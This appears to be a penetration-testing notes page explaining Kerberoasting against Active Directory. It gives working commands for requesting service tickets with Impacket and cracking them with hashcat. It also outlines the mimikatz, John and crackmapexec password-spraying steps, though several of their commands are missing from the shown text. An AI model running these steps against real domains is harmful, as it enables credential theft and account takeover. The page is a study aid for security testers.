Kerberoast
Theory
Kerberoasting is an extremely common attack in active directory environments which targets Active Directory accounts with the SPN value set. Common accounts with the SPN (Service Principal Name) set are service accounts such as IIS User/MSSQL etc.
Kerberoasting involves requesting a Kerb Service Ticket (TGS) from a Windows Domain Machine or Kali Box using something like GetUserSPN’s.py. The problem with TGS is once the the DC looks up the target SPN it encrypts the TGS with the NTLM Password Hash of the targeted user account.
Having a Credential
Step 1: Impacket-GetUserSPNs
Use impacket-GetUserSPNs to gather SPNs. Must hava valid credential:
impacket-GetUserSPNs.py '<domain>/<username>:<password>' -dc-ip <target_ip> -requestStep 2: Crack the TGS ticket with hashcat
Save the TGS ticket as hash.txt and crack it with hashcat mode 13100:
hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txtHaving a Shell
Step 1: GetUserSPNs
Transfer the GetUserSPNs.ps1 script from the following Github repo to the victim machine and run it:
https://github.com/nidem/kerberoast
Step 2: Request service tickets
Execute the following two commands in PowerShell:
Or request ticket with Mimikatz:
Step 3: Export service ticket to kirbi file
Transfer /usr/share/windows-resources/mimikatz/x64/mimikatz.exe to the victim machine and export service ticket:
Download the kirbi file to Kali.
Step 4: Crack the kirbi file with John
Convert the kirbi file to John's format:
Note that this kirbi2john.py script is also from the "kerberoast" Github repo mentioned above. Don't use the Kali built-in kirbi2john, it does not work by the time of writing.
Crack the hash with John:
Password Spray
Note that users might reuse the same password for different accounts. Once we get a plaintext password, spray it on the username list you collectedfrom net user /domain with crackmapexec:
Reference
Last updated
Was this helpful?